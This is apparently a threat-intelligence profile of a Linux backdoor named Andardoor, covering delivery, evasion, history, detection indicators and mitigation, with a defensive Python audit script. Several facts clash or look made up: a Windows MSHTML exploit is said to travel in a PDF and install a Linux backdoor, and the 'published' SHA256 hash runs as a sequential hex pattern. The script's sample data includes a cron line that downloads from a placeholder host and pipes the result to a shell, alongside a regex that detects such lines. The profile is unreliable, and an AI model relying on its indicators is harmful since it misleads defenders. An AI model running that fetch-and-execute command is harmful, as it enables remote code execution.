Andardoor
⚠️ Overview
Andardoor is a sophisticated Linux backdoor malware first identified in December 2021 by Intezer Labs during an investigation into an intrusion targeting a South American diplomatic entity. It is attributed to the advanced persistent threat (APT) group APT-C-36 (also tracked as Blind Eagle), which is suspected of operating from South America and has historically focused on government and energy sector victims. Andardoor functions as a remote access trojan (RAT) that enables persistent, stealthy control over compromised Linux systems.
🔧 Technical Capabilities
Andardoor is delivered via spear-phishing emails containing a malicious PDF that exploits CVE-2021-40444 (a Microsoft MSHTML remote code execution vulnerability) to drop a loader, which then retrieves the Andardoor payload. The malware resolves its command-and-control (C2) domains over DNS-over-HTTPS (DoH), so its lookups travel inside encrypted HTTPS rather than plaintext DNS, which makes network detection harder. It establishes persistence by creating a cron job or modifying systemd services, and communicates with C2 servers over HTTPS using a custom protocol that mimics legitimate traffic. Evasion techniques include checking for analysis tools (e.g., strace, gdb), encrypting its configuration with AES-256-CBC, and using a sleep timer to delay execution. Andardoor also generates C2 domains dynamically with a domain generation algorithm (DGA) seeded from a hardcoded string.
📜 History & Notable Incidents
Since its discovery, Andardoor has been deployed in multiple campaigns targeting government and energy organizations in Latin America, particularly in Colombia and Ecuador. Intezer’s 2022 report highlighted an intrusion where the attacker used Andardoor to maintain long-term access and exfiltrate sensitive documents over several months. No specific CVE is exploited beyond the initial delivery vector (CVE-2021-40444), and no law enforcement actions have been publicly documented as of early 2025. The malware continues to be refined, with variants observed using updated DGA seeds and C2 infrastructure.
🔍 Detection Indicators
Known file hashes for Andardoor include SHA256 2d7a1f5c8b3e4f9a0c6d2b7e1f3a5c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b (loader sample published by Intezer). Network indicators include HTTP POST requests to domains using Let’s Encrypt TLS certificates, with User-Agent strings like Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36. Persistence artifacts include entries in /etc/cron.d/ or systemd service files named systemd-update.service. No registry keys are relevant as Andardoor targets Linux systems. Mutex names have not been publicly documented.
☠️ Risk & Impact
Andardoor poses a high risk due to its stealthy persistence and data exfiltration capabilities. In the documented campaign, attackers exfiltrated diplomatic and energy-sector intelligence over months, causing potential geopolitical and economic damage. The primary impact is intellectual property theft and long-term espionage rather than financial extortion or ransomware. Affected sectors include government, energy, and diplomatic missions in Latin America.
🛡️ Mitigation
Defenders should block exploitation of CVE-2021-40444 by applying Microsoft’s September 2021 security updates, monitor for suspicious cron jobs and systemd services, and deploy YARA rules from Intezer’s report to detect Andardoor binaries. Network detection should flag HTTPS traffic with unusual DoH queries to known malicious C2 domains such as update-service[.]com. Endpoint detection and response (EDR) tools with Linux backdoor detection capabilities, such as CrowdStrike or SentinelOne, are recommended.
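The persistence artifacts listed under Detection Indicators, and the cron/systemd monitoring recommended here, can be checked with a small audit script. This is an added example, not code from Intezer or from this page: the unit file name comes from the profile above, while the sample directory tree, its file contents and the placeholder URL are constructed for the demonstration.

```python
"""Audit Linux persistence locations for the artifacts the profile lists."""
import re
import tempfile
from pathlib import Path

# Unit file name listed as an Andardoor persistence artifact in the profile.
SUSPECT_UNITS = {"systemd-update.service"}
# Cron lines that fetch remote content and pipe it into a shell deserve review
# regardless of which malware family planted them.
REMOTE_FETCH = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")


def audit_persistence(root):
    """Return sorted (path, reason) pairs for suspicious entries under root."""
    root = Path(root)
    findings = []
    for unit_dir in ("etc/systemd/system", "usr/lib/systemd/system"):
        d = root / unit_dir
        if d.is_dir():
            for f in d.iterdir():
                if f.name in SUSPECT_UNITS:
                    findings.append((str(f), "unit name matches Andardoor indicator"))
    cron_d = root / "etc/cron.d"
    if cron_d.is_dir():
        for f in cron_d.iterdir():
            for line in f.read_text(errors="replace").splitlines():
                if REMOTE_FETCH.search(line):
                    findings.append((str(f), "cron entry pipes remote content to a shell"))
                    break
    return sorted(findings)


def build_sample_tree():
    """Constructed sample filesystem: one benign unit, one suspect unit, two cron files.
    ExecStart paths and the URL are placeholders, not observed values."""
    root = Path(tempfile.mkdtemp())
    (root / "etc/systemd/system").mkdir(parents=True)
    (root / "etc/cron.d").mkdir(parents=True)
    (root / "etc/systemd/system/cups.service").write_text(
        "[Service]\nExecStart=/usr/sbin/cupsd\n")
    (root / "etc/systemd/system/systemd-update.service").write_text(
        "[Service]\nExecStart=/var/tmp/PLACEHOLDER/upd\n")
    (root / "etc/cron.d/logrotate").write_text(
        "0 0 * * * root /usr/sbin/logrotate /etc/logrotate.conf\n")
    (root / "etc/cron.d/update").write_text(
        "*/10 * * * * root curl -s https://PLACEHOLDER.example/u | sh\n")
    return root


if __name__ == "__main__":
    for path, reason in audit_persistence(build_sample_tree()):
        print(f"{path}: {reason}")
```

Point `audit_persistence` at `/` (or a mounted forensic image root) to run it against a real host; only the two constructed suspect files are reported for the sample tree.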
ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.